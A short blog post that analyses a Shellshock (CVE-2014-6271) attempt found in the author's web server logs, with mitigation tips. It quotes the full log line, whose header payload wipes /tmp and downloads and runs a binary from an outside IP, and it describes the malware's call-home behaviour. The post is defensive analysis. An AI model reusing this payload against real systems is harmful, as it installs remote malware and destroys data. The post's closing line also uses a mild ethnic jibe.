Nice Try !
17 Mar 2015Weird logs
Watch your web logs, you’ll see some people do sometimes try very hard :
renzokuken.eu:80 222.186.21.115 - - [16/Mar/2015:06:50:59 +0100] "GET / HTTP/1.1" 403 426 "() { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget http://222.186.21.115:999/udso -O /tmp/China.Z-dmhi >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-dmhi >> /tmp/Run.sh;echo /tmp/China.Z-dmhi >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\"" "() { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget http://222.186.21.115:999/udso -O /tmp/China.Z-dmhi >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-dmhi >> /tmp/Run.sh;echo /tmp/China.Z-dmhi >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\""
# Most advanced threat ever
Exploit
Those are some nice Referer̀ and User-Agent. They are actually the same string and try to exploit CVE-2014-6271, the so called ‘Shellshock’ bug.
On an unpatched system, this exploit will:
- Remove your stuff from
/tmp/. It will actually leave files/dirs that start with a ‘.’ -
Make a script
/tmp/Run.shwith the following content:wget http://222.186.21.115:999/udso -O /tmp/China.Z-dmhi echo By China.Z chmod 777 /tmp/China.Z-dmhi /tmp/China.Z-dmhi rm -rf /tmp/Run.sh
- Run
/tmp/Run.sh
## Malware
The udso file is ‘packed’ with UPX (strings, lol) and is actually a big (1.5M) statically linked executable.
It asks Google’s DNS at 8.8.8.8 for the IP of 2015.lnuxx.pw (which is currently 222.186.21.42 ), then connects to it on port 10991 and proceeds to send some info about the system it’s in, with some plaintext strings. Most advanced !
## Mitigation
- Keep your system updated
- Don’t run CGI scripts on your webserver
- Configure firewalls on your servers
- Use your own DNS servers
Any one of those will protect you from the evil chinese-fu